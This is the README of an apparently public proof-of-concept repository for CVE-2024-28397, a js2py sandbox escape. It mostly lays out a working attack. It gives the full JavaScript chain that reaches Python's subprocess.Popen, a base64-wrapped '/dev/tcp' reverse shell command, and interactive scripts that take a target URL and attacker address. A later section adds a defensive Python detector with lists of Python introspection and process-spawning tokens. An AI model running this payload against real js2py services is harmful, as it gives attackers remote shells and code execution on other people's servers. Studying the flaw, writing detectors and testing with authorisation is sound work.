
CVE-2024-28397 PoC — Js2Py Security Vulnerability

Associated Vulnerability
Title: Js2Py Security Vulnerability (CVE-2024-28397)
Description: An issue in the component js2py.disable_pyimport() of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call.
Readme
# CVE-2024-28397 js2py Sandbox Escape Exploit

A collection of exploit scripts targeting the js2py sandbox escape vulnerability (CVE-2024-28397) that allows arbitrary code execution through Python object introspection.

## 🔍 Vulnerability Overview

The js2py library contains a critical sandbox escape vulnerability that allows attackers to execute arbitrary Python code by accessing internal Python objects through JavaScript's `Object.getOwnPropertyNames()` method.

### Technical Details

- **CVE ID**: CVE-2024-28397
- **Affected Library**: js2py (JavaScript to Python translator)
- **Attack Vector**: Sandbox escape via Python object introspection
- **Impact**: Remote Code Execution (RCE)

## 📋 Reference Analysis

This exploit is based on the comprehensive analysis by Marven11:
- **Analysis Document**: [CVE-2024-28397 js2py Sandbox Escape Analysis](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape/blob/main/analysis_en.md)

## 🛠️ Exploit Scripts

This repository contains the following implementations:

### 1. Bash Script (`exploit.sh`)
Lightweight bash implementation using curl and jq.

### 2. Go Script (`exploit.go`)
Cross-platform Go implementation with built-in HTTP client.

## 🚀 Quick Start

### Prerequisites
- **For Bash script**: `curl`, `jq`, `base64`
- **For Go script**: Go 1.16+

### Usage

All scripts are interactive and will prompt for required information:

```bash
# Bash version
chmod +x exploit.sh
./exploit.sh

# Go version
go run exploit.go
```

### Interactive Prompts

Each script will ask for:
1. **Target URL**: The endpoint running vulnerable js2py code
2. **Your IP**: Your machine's IP address for reverse shell
3. **Your Port**: Port number for reverse shell connection

### Example Session

```bash
$ ./exploit.sh
Target URL: http://target.example.com:8000/run_code
Your IP: 10.10.14.3
Your Port: 9001
Sending to http://target.example.com:8000/run_code with reverse shell 10.10.14.3:9001
{"result": "executed"}
```

## 🎯 How It Works

### 1. Payload Generation
The exploit dynamically creates a reverse shell command:
```bash
sh -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1
```

### 2. Base64 Encoding
The shell command is base64-encoded for safe transmission:
```bash
base64_payload=$(echo -n "$reverse_shell" | base64 -w 0)
```

### 3. JavaScript Sandbox Escape
The core exploit uses JavaScript to access Python's internal objects:

```javascript
let cmd = "printf BASE64_PAYLOAD|base64 -d|bash";
let a = Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__;
let obj = a(a(a,"__class__"), "__base__");
function findpopen(o) {
    for(let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i];
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item;
        }
        if(item.__name__ != "type") {
            let result = findpopen(item);
            if(result) return result;
        }
    }
}
let result = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate();
```

### 4. Execution Flow
1. Access Python's object system through `Object.getOwnPropertyNames({})`
2. Navigate to base classes via `__class__.__base__.__getattribute__`
3. Search subclasses for `subprocess.Popen`
4. Execute arbitrary system commands through `Popen`

## 🛡️ Mitigation

- Update js2py to a patched version
- Implement proper input validation and sanitization
- Use secure sandboxing alternatives
- Apply defense-in-depth security measures
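As an added defensive example (not part of this repository's scripts), the following Python heuristic scans JavaScript submitted to a js2py-backed endpoint, such as the request bodies a `/run_code` handler would log, for the Python dunder attributes the escape chain walks (`__class__`, `__base__`, `__subclasses__`, `__getattribute__`, `__module__`) and for the names it needs once it reaches Python object space. None of those attributes is a legitimate JavaScript property, so any occurrence in untrusted JS is a strong signal. The request log, the token lists and the function names are constructed for this example.

```python
"""Heuristic detector for Python-introspection tokens in JavaScript sent to a
js2py-backed service. Added example; not code from the exploit repository."""
import re
from dataclasses import dataclass, field

# Python attributes the sandbox escape chains together. These are never valid
# JavaScript property names, so their presence in submitted JS is suspicious.
PYTHON_INTROSPECTION_TOKENS = (
    "__class__", "__base__", "__bases__", "__mro__", "__subclasses__",
    "__getattribute__", "__module__", "__globals__", "__builtins__", "__import__",
)

# Names the escape needs once it has reached Python object space.
PYTHON_EXEC_HINTS = ("subprocess", "Popen", "os.system", "communicate")

# Dunder-style names that are legitimate in JavaScript and must not raise alerts.
JS_LEGITIMATE_DUNDERS = {
    "__proto__", "__defineGetter__", "__defineSetter__",
    "__lookupGetter__", "__lookupSetter__",
}

_DUNDER_RE = re.compile(r"__[A-Za-z_]+__")


@dataclass
class ScanResult:
    introspection_tokens: list = field(default_factory=list)
    exec_hints: list = field(default_factory=list)
    other_dunders: list = field(default_factory=list)

    @property
    def severity(self) -> str:
        # Introspection chain plus process-spawning names: the full escape pattern.
        if self.introspection_tokens and self.exec_hints:
            return "high"
        if self.introspection_tokens:
            return "medium"
        if self.other_dunders:
            return "low"
        return "none"


def scan_js(source: str) -> ScanResult:
    """Classify one JavaScript source string by the Python-side names it contains."""
    result = ScanResult()
    for tok in PYTHON_INTROSPECTION_TOKENS:
        if tok in source:
            result.introspection_tokens.append(tok)
    for hint in PYTHON_EXEC_HINTS:
        if hint in source:
            result.exec_hints.append(hint)
    # Any other Python-looking dunder (e.g. __name__) is a weaker, low-severity hint.
    for name in sorted(set(_DUNDER_RE.findall(source))):
        if name not in PYTHON_INTROSPECTION_TOKENS and name not in JS_LEGITIMATE_DUNDERS:
            result.other_dunders.append(name)
    return result


def flag_requests(log_entries):
    """Return (timestamp, severity, introspection tokens) for each suspicious request body."""
    flagged = []
    for entry in log_entries:
        r = scan_js(entry["body"])
        if r.severity != "none":
            flagged.append((entry["ts"], r.severity, tuple(r.introspection_tokens)))
    return flagged


# Constructed sample request log: a benign submission, a submission carrying the
# introspection chain from the write-up above, and legitimate JS that uses __proto__.
SAMPLE_REQUEST_LOG = [
    {"ts": "2024-06-01T12:00:00Z", "path": "/run_code",
     "body": "function add(a, b) { return a + b; } add(2, 3);"},
    {"ts": "2024-06-01T12:00:05Z", "path": "/run_code",
     "body": ('let a = Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__;'
              'let obj = a(a(a,"__class__"), "__base__");'
              'for (let i in obj.__subclasses__()) { let it = obj.__subclasses__()[i];'
              'if (it.__module__ == "subprocess" && it.__name__ == "Popen") {} }')},
    {"ts": "2024-06-01T12:00:09Z", "path": "/run_code",
     "body": "let p = Object.create(null); p.__proto__ = Array.prototype; p.length;"},
]

if __name__ == "__main__":
    for ts, sev, toks in flag_requests(SAMPLE_REQUEST_LOG):
        print(f"{ts} severity={sev} tokens={','.join(toks)}")
```

String matching like this is a signal for blocking and alerting, not a security boundary: attribute names can be assembled at runtime in JavaScript, so the detector complements, rather than replaces, keeping untrusted JavaScript away from js2py altogether.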

## 📚 Educational Purpose

These scripts are provided for educational and authorized testing purposes only. Always ensure you have proper authorization before testing against any systems.

## 🔗 References

- [CVE-2024-28397 Official Entry](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28397)
- [Marven11's Detailed Analysis](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape/blob/main/analysis_en.md)
- [js2py GitHub Repository](https://github.com/PiotrDabkowski/Js2Py)

## ⚖️ Disclaimer

This software is provided for educational and authorized security testing purposes only. Users are responsible for complying with applicable laws and obtaining proper authorization before use.